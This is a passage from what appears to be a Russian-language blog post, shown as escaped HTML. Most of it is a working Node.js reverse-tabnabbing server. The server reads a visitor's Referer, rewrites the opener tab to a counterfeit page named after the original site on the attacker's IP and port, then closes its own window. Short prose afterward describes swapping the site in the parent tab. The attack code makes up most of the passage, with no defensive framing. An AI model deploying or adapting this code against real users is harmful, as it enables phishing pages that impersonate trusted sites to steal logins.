var http = require('http');  if(!process.argv[2] || !process.argv[3]){console.log('Usage: node '+process.argv[1]+' ip port');process.exit(1)}  http.createServer(function (rq, rs) {  rs.writeHead(200, {'Content-Type': 'text\/html'}); \/\/\u0432\u0441\u0435\u043c \u0434\u043e\u0431\u0440\u0430, \u0432\u0441\u0435\u043c 200   if(!rq.headers.referer){ \/\/ \u0435\u0441\u043b\u0438 Referer \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442  rs.end('');  console.log('Referer is undefined!');  process.exit(1);  }  var host=require('url').parse(rq.headers.referer).hostname; \/\/ \u0418\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u043c \u0434\u043e\u043c\u0435\u043d \u0438\u0437 Referer'\u0430  var out="<html><script>"+  "window.opener.location='http:\/\/"+process.argv[2]+":"+process.argv[3]+"\/"+host+".html';"+ \/\/\u043f\u0435\u0440\u0435\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u043c \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u043d\u0430 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u0443\u044e  "window.close()"+    \/\/\u0437\u0430\u043a\u0440\u044b\u0432\u0430\u0435\u043c \u043e\u043a\u043d\u043e   "<\/script><\/html>";  rs.end(out); \/\/\u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c \u043f\u043e\u0434\u043c\u0435\u043d\u0443  console.log('Window.opener changed!');  process.exit(1);   }).listen(80) \/\/ \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c\u0441\u044f \u043d\u0430 80 \u043f\u043e\u0440\u0442\u0443 <\/code><\/pre>\n
  \u042d\u0442\u043e\u0442 \u043f\u0440\u043e\u0441\u0442\u0435\u043d\u044c\u043a\u0438\u0439 \u043a\u043e\u0434 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u0434\u043c\u0435\u043d\u0438\u0442\u044c \u0441\u0430\u0439\u0442 \u0432\u043e \u0432\u043a\u043b\u0430\u0434\u043a\u0435-\u0440\u043e\u0434\u0438\u0442\u0435\u043b\u0435.
  \u041e\u0433\u043e\u0432\u043e\u0440\u044e\u0441\u044c, \u0447\u0442\u043e \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0443\u0434\u0435\u0442 \u0438\u0434\u0442\u0438 \u043d\u0430 \u0430\u0434\u0440\u0435\u0441: site<\/a>:port\/referer.html. \u0413\u0434\u0435 \u00abreferer\u00bb \u2014 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0432\u0438\u0434\u0430 site.*
  \u0412\u0432\u0438\u0434\u0443 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0441\u043d\u044f\u0442\u044c \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u044b \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u0442\u0438\u0447\u043d\u043e, \u044f \u0437\u0430\u043f\u0438\u0441\u0430\u043b \u0432\u0438\u0434\u0435\u043e:<\/p>\n